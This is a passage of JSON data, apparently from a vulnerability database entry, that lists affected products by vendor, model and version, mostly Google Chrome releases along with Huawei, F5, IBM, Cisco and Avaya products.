"vendor": "google", "version": "6.0.472.21" }, { "model": "e9000 blade server ch221 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.49" }, { "model": "gaia r75", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.308.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1272.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.234" }, { "model": "galax8800 v100r002c85", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.21" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.103" }, { "model": "move antivirus agentless", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "sdn for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big data appliance", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.650.0" }, { "model": "gaia embedded r77", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.19" }, { "model": "vcenter support assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.8" }, { "model": "oceanstor s6800t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.338.0" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.451.0" }, { "model": "vsphere app ha", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.59" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1301.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.29" }, { "model": "saas web protection", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.868.0" }, { "model": "agile controller v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1304.1" }, { "model": "webex pcnow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.19" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.4" }, { "model": "oceanstor s6800t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "qlogic 20-port 8gb san switch module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.45" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "oceanstor cse v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.15" }, { "model": "power hmc r8.1.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.0" }, { "model": "web element manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.427.0" }, { "model": "e9000 blade server ch242 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "ipso r70.1", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1024" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.16" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.43" }, { "model": "oceanstor s5500t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.276.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.117" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "espace u2980 v100r001c10spc102", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.933.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.0" }, { "model": "netauthenticate", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.574.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.936.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.38" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.27" }, { "model": "3722-s51", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "workcentre r14-10 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7775061.090.224.30300" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.64" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.320.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.946.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.65" }, { "model": "ads virtual app", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.48" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.888.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.18" }, { "model": "access registrar appliance cisco prime access registrar applianc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1307.0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.224.0" }, { "model": "rack server rh5885 v100r001c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1678.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.97" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.704.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.149" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.60" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1035" }, { "model": "policy assessment and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.288.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "ipso r76", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1291.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.68" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.43" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "oceanstor 18800f v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.59" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3" }, { "model": "espace uc v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.41" }, { "model": "espace uc v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.632.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.158" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.154" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.328" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.9" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.2" }, { "model": "aura application server sip core pb26", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "vae v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.899.0" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.2" }, { "model": "websphere process server hypervisor edition for novell suse", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1029" }, { "model": "gaia r71.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.571.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.57" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1677.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.82" }, { "model": "esight network v200r003c10spc206", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.734.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.1" }, { "model": "cloudsystem enterprise software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.4" }, { "model": "gaia embedded r75.46", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia r70.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura communication manager sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1310.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.34" }, { "model": "t505 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.342" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.93" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.485.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.678.0" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.16" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "virtual compute appliance software", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "puredata system for analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.372.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.949.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.638.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.392.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.212" }, { "model": null, "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2053-4340" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1063" }, { "model": "gaia embedded r75.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.710.0" }, { "model": "sig9800 sig9800-x16 v300r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.206" }, { "model": "fusioncompute v100r003c10cp6001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.289.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.11" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1685.0" }, { "model": "vpn gateway", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3070" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.735.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.568.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.487.0" }, { "model": "ipso r70.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.129" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.9" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.590.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.113" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.23" }, { "model": "rack server rh5885 v100r003c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "gaia r71.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "system storage san04b-r 2005-r04", "scope": null, "trust": 0.3, "vendor": 